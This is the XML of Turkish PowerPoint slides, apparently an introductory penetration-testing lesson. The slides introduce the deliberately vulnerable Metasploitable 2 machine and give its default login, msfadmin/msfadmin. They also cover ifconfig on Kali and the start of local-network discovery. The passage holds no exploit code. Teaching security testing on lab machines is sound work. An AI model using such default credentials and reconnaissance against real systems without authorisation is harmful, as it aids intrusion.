                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAD02899-1201-8392-112E-39F4BD958FEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247888" y="303032"/>
            <a:ext cx="3785616" cy="3709903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Dikdörtgen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30B03891-1706-A179-3327-1594B643EA66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5614989" y="5241455"/>
            <a:ext cx="3500436" cy="3163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Metin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBFD5069-1FB3-96A6-B85F-73C27153B0B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082111" y="3843338"/>
            <a:ext cx="3289864" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Port, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, versiyon ve versiyon bilgileri hedef sistem hakkında öğrenilmesi gereken başlıca verilerdir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956155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72DB81-F867-9785-7E6E-92012D0A95CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Nedir?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4FAAF6-6913-0C0A-3561-58BA1C7B1D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> uygulamalı sızma eğitimlerinde kullanılan zafiyetli bir makinadır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>İçerişinde özellikle oluşturulmuş zafiyetler biz siber güvenlik meraklılarına beceri kazandırmayı amaçlamıştır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ben eğitim aracı olarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 2 sürümünü ve farklı sürümleri de mevcuttur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3675887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metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD8FAB90-03CB-EE40-FEE0-F80121C27D68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="40000"/>
          </a:blip>
          <a:srcRect b="10000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Başlık 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC65B7-D3D0-1BB0-F277-7295B8DD1514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1103906" y="476629"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> 2 kurulumundan sonra bizleri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" b="1" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ekranı karşılar ve bizden kullanıcı “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" b="1" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”adını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ardından </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>kullanı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" b="1" i="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”unu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2900" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ister.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25"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ol Ok 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2054AF42-8E56-DD2E-BD59-63EE029BA777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663440" y="6537960"/>
            <a:ext cx="2164080" cy="32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7071341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16792299-E749-102F-84A8-2558F1AF7633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="968904"/>
            <a:ext cx="10096890" cy="5220023"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Metin kutusu 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98F85A4-982E-76D3-8545-F5D83FD0CCE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5597216" y="5501668"/>
            <a:ext cx="2096429" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>msfadmin</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>msfadmin</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Sağ Ok 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1770E8-6752-4F50-5E19-290CBA4A8D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386263" y="5720356"/>
            <a:ext cx="1010928" cy="208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25922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5">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çerik Yer Tutucusu 8" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F5E1A37-8031-1CC8-EE84-9D17B9B1149D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="-1" b="5038"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="12188952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">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5" name="Rectangle 2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CB106FD-9ECB-0F2D-9E23-C8CC1C4D973A}"/>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2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>İfconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> : Ip, netmask </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> broadcast </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bilgilerimizi</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veren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>işletim</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sistemi</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komutudur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.(Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Makinası</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için</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geçerli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="İçerik Yer Tutucusu 4" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8356DA38-582B-22CB-E6D9-00386E087BCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1744835"/>
            <a:ext cx="10710320" cy="4790631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Dikdörtgen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CC03A-AAE4-4335-F227-9A18B406E9DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957388" y="2543175"/>
            <a:ext cx="8558212"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2887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levha içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48384CCE-CDA6-5832-878B-63AFC30F945E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12032343" cy="5526850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Dikdörtgen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8F0712-36CF-7839-A235-D75F773F3F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4032033"/>
            <a:ext cx="1052623" cy="4572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7C02EC25-FCFD-15C4-8518-C7A08E367162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5756205"/>
            <a:ext cx="11803117" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0"/>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» parametresi ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>makinamazın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> IP adresini ve ağ kartlarını görebiliriz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36978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D2953D4-68E9-3B77-B837-632F7BC5E0A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971080" y="257175"/>
            <a:ext cx="10443556" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ve Broadcast bilgilerimizi öğrendiğimize göre ağımızda bağlı bulunan cihazları öğrenelim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Öncelikle yerel ağdaki cihazların birbiri ile iletişimini «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
